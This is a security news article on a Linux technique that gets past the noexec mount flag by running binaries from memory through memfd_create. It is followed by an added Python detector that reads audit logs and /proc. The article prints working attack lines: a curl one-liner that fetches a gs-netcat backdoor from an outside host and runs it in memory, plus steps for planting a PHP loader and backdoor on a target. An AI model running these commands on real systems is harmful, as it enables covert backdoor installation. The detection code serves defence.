Linux Systems Vulnerable to New ‘noexec’ Bypass Technique: Arbitrary Code Execution Now Possible

Summary: Security researchers have discovered a method that allows attackers to bypass the ‘noexec’ flag in Linux systems, enabling the execution of malicious code even on protected partitions. This technique utilizes a combination of scripting languages and system calls to execute binaries downloaded from the internet without requiring root privileges.

Threat Actor: Attackers
Victim: Linux Systems

Key Points:

  • The ‘noexec’ flag is designed to prevent the execution of binaries on specific partitions, but this new technique circumvents that protection.
  • Attackers can execute commands and download malicious payloads from remote servers without needing root access, posing a significant security risk.
  • Researchers recommend monitoring system calls and implementing additional safeguards to protect against this vulnerability.

Security researchers have unveiled a novel technique that allows attackers to bypass the ‘noexec’ flag in Linux systems, potentially enabling the execution of malicious code even on partitions specifically configured to prevent it.

The ‘noexec’ flag is a crucial security measure in Linux, preventing the execution of binary files on designated partitions, such as /tmp or /dev/shm. This restriction is designed to thwart attackers who attempt to upload and execute malware on these commonly targeted areas. However, the newly discovered method circumvents this protection using a clever combination of Perl, Bash, and PHP scripts.

What makes this technique particularly concerning is its ability to execute binaries downloaded directly from the internet, even on partitions with ‘noexec’ enabled. This is achieved by leveraging system calls like memfd_create and execveat to inject shellcode into running processes and load the binary from memory. Furthermore, the method does not require root privileges, making it accessible to a wider range of potential attackers.

Researchers have demonstrated the technique’s effectiveness by showcasing examples where common commands like id are executed without root access, even on ‘noexec’ partitions. More alarmingly, they have shown how attackers could use this method to download and execute malicious payloads from remote servers using simple commands.

A Perl example demonstrates how the ‘id’ command can be executed without root privileges:

source memexec-perl.sh
cat /usr/bin/id | memexec -u

In Bash, this can be achieved similarly:

source memexec-bash.sh
cat /usr/bin/id | memexec

The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohibited by noexec:

curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | GS_ARGS="-ilDq -s ChangeMe" perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@"

The method effectively bypasses command execution restrictions in PHP through similar scripts, representing a significant vulnerability for systems relying on such restrictions to guard against malicious code.

Upload memexec.php and egg (your backdoor) onto the target.
Calling curl -SsfL https://target/memexec.php will execute egg.

Researchers continue to analyze this technique and its potential implications for Linux system security, emphasizing the importance of implementing additional safeguards to prevent the use of this method in real-world attacks. It is also recommended to monitor access to system calls and restrict their use, particularly in environments with heightened security requirements.
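As an added example, not code from the article or from the researchers it cites, the following Python shows one way to act on the recommendation to monitor the system calls involved: it correlates auditd records in which a process makes a successful memfd_create call and then execs, flags any exec whose image or path is memory-backed, and offers a live check of /proc/<pid>/exe links for the same condition. The audit lines are constructed samples in standard auditd record format; the auditctl rule in the comment is assumed to be loaded on a host with a recent audit userspace, and the function and variable names are this example's own.

```python
"""Detection of memfd-based in-memory execution from audit records and /proc.

Added example; not part of the original article.  Assumes auditd is logging
syscalls with a rule such as (x86_64 ABI; syscall names need a recent audit
userspace):

    -a always,exit -F arch=b64 -S memfd_create,execveat,execve -k memexec
"""
import os
import re

# Syscall numbers as x86_64 / aarch64 pairs.  The article's one-liner tries
# 319 and 279, which are memfd_create on those two architectures.
MEMFD_CREATE = {319, 279}
EXECVEAT = {322, 281}
EXECVE = {59, 221}

# auditd records are key=value fields; values may be double-quoted.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample records (not real logs).  Record order follows auditd:
# the SYSCALL record of an event is emitted before its EXECVE record.
SAMPLE_AUDIT = [
    # benign: a shell runs /usr/bin/id from disk
    'type=SYSCALL msg=audit(1700000000.050:100): arch=c000003e syscall=59 success=yes exit=0 '
    'pid=5000 ppid=4100 uid=1000 comm="id" exe="/usr/bin/id" key="memexec"',
    # suspicious: perl creates an anonymous in-memory file (fd 3) ...
    'type=SYSCALL msg=audit(1700000000.100:101): arch=c000003e syscall=319 success=yes exit=3 '
    'pid=4242 ppid=4100 uid=1000 comm="perl" exe="/usr/bin/perl" key="memexec"',
    # ... then execs it through /proc/<pid>/fd/3; the new image is memfd-backed
    'type=SYSCALL msg=audit(1700000000.200:102): arch=c000003e syscall=59 success=yes exit=0 '
    'pid=4242 ppid=4100 uid=1000 comm="3" exe="/memfd:  (deleted)" key="memexec"',
    'type=EXECVE msg=audit(1700000000.200:102): argc=1 a0="/proc/4242/fd/3"',
]


def parse_audit_line(line):
    """Return the key=value fields of one auditd record as a dict."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def memory_backed_path(path):
    """True if a path can only name an anonymous (memfd) or fd-backed image."""
    return path.startswith("/memfd:") or re.match(r"^/proc/(self|\d+)/fd/\d+$", path) is not None


def detect_memexec(lines):
    """Correlate audit records and return (pid, reason) findings.

    Flags a successful memfd_create followed by an exec in the same pid, any
    SYSCALL record whose exe is memory-backed, and any EXECVE record whose
    argv[0] path is memory-backed (linked to its pid via the audit event id).
    """
    saw_memfd = set()   # pids that successfully called memfd_create
    event_pid = {}      # audit event id -> pid, to link EXECVE records
    findings = []
    for line in lines:
        rec = parse_audit_line(line)
        rtype, event = rec.get("type"), rec.get("msg", "")
        if rtype == "EXECVE":
            a0 = rec.get("a0", "")
            if memory_backed_path(a0):
                findings.append((event_pid.get(event, "?"), "exec path is memory-backed: " + a0))
            continue
        if rtype != "SYSCALL":
            continue
        pid = rec.get("pid", "?")
        event_pid[event] = pid
        try:
            nr = int(rec.get("syscall", -1))
        except ValueError:
            continue
        ok = rec.get("success") == "yes"
        if ok and nr in MEMFD_CREATE:
            saw_memfd.add(pid)
        elif ok and nr in EXECVE | EXECVEAT and pid in saw_memfd:
            findings.append((pid, "memfd_create followed by exec in the same pid"))
        exe = rec.get("exe", "")
        if memory_backed_path(exe):
            findings.append((pid, "exe is memory-backed: " + exe))
    return findings


def scan_proc(proc="/proc"):
    """Live check: list (pid, target) for processes whose exe link is memory-backed."""
    if not os.path.isdir(proc):
        return []
    hits = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:
            continue  # kernel thread, already exited, or not readable by this user
        if memory_backed_path(target):
            hits.append((entry, target))
    return hits


if __name__ == "__main__":
    for pid, reason in detect_memexec(SAMPLE_AUDIT):
        print(f"audit: pid {pid}: {reason}")
    for pid, target in scan_proc():
        print(f"live: pid {pid} is running from {target}")
```

The audit correlation catches the pattern regardless of which scripting language drives it, since all variants end with an exec of a memfd-backed image; the /proc scan is a cheap complement for hosts without auditd, but it only sees processes that are still running.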


Source: https://securityonline.info/linux-systems-vulnerable-to-new-noexec-bypass-technique-arbitrary-code-execution-now-possible